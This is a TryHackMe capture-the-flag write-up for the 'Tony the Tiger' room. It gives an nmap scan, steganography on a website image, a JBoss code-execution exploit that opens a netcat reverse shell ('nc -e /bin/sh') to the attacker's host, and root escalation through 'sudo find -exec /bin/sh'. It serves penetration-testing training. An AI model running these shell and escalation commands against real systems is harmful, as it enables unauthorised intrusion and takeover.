Tony the Tiger — TryHackMe — WriteUp

4 min readNov 12, 2020


Hello. I’m Rahmos. Here is my Tony the Tiger — TryHackMe — WriteUp. Check it out!

I’m going right into task 3. Cause you can answer all the questions of task 2 by reading.


First, deploy the machine and scan for opened ports using nmap.

nmap -A -T4 -v -p- <ip>

nmap -A -sV -p8080 <ip> to scan for service running on port 8080

port 8080

So copy the “VERSION’’ and it’s your first ans. And for the 2nd question, it’s “JBOSS”.


First, let’s access the website at port 80. It’s where Tony talking about “cereal”.

Website port 80

Look closely at his first post:

First post

Photos that have a deeper meaning means Steganography! Download his avatar and find hidden data.

Here is the link of his avatar:

I’m gonna use wget to get this image.

Get his avt

I’ve used strings to find out what is hidden, but it seems I’m inspecting the wrong image.

Get back to the web and click on his other post: Frosted Flakes. You will see another image. Again, download this image and find hidden data.

Here is the link:

Frosted Flakes

strings be2sOV9.jpg


Here you’ll get the 1st flag.


Because the web app is vulnerable to code execution, so we will spawn a reverse shell.

First, start a listener on your machine:

nc -lvnp 4444

Download the exploit code from THM, and exec like this command:

python3 <ip>:8080 “nc -e /bin/sh <your-vpn-ip> 4444”

exec code

When it’s successful, you will have the shell.


In order to get a stable shell, and also can su to another user, spawn a tty shell using python:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

tty shell


The question is JBOSS’s flag, so let’s cd to /home/jboss to look around

There is a “note” file inside jboss’s home folder. Read its content.

content of note

Now we know Jboss’s password. Let’s su to him

su jboss

List content and cat jboss’s flag

list content
jboss’s flag


Now I’ll find a way to get root!

First, sudo -l to see if jboss can run command as root:

sudo -l

So, jboss can run “find” as root without password needed.

find can execute another command with flag -exec, so let’s spawn a root shell using this command:

sudo find . -exec /bin/sh \; -quit

*Remember the \; at the end, because it indicates the end of the statement to execute.

Now I’m root! Get our final flag in /root/root.txt

root flag

It’s encoded with Base64 and hashed with MD5. So firtst, decode the string from base64, then crack with md5 hash.

decoded from Base64

Then copy the decoded string to to crack.


The end.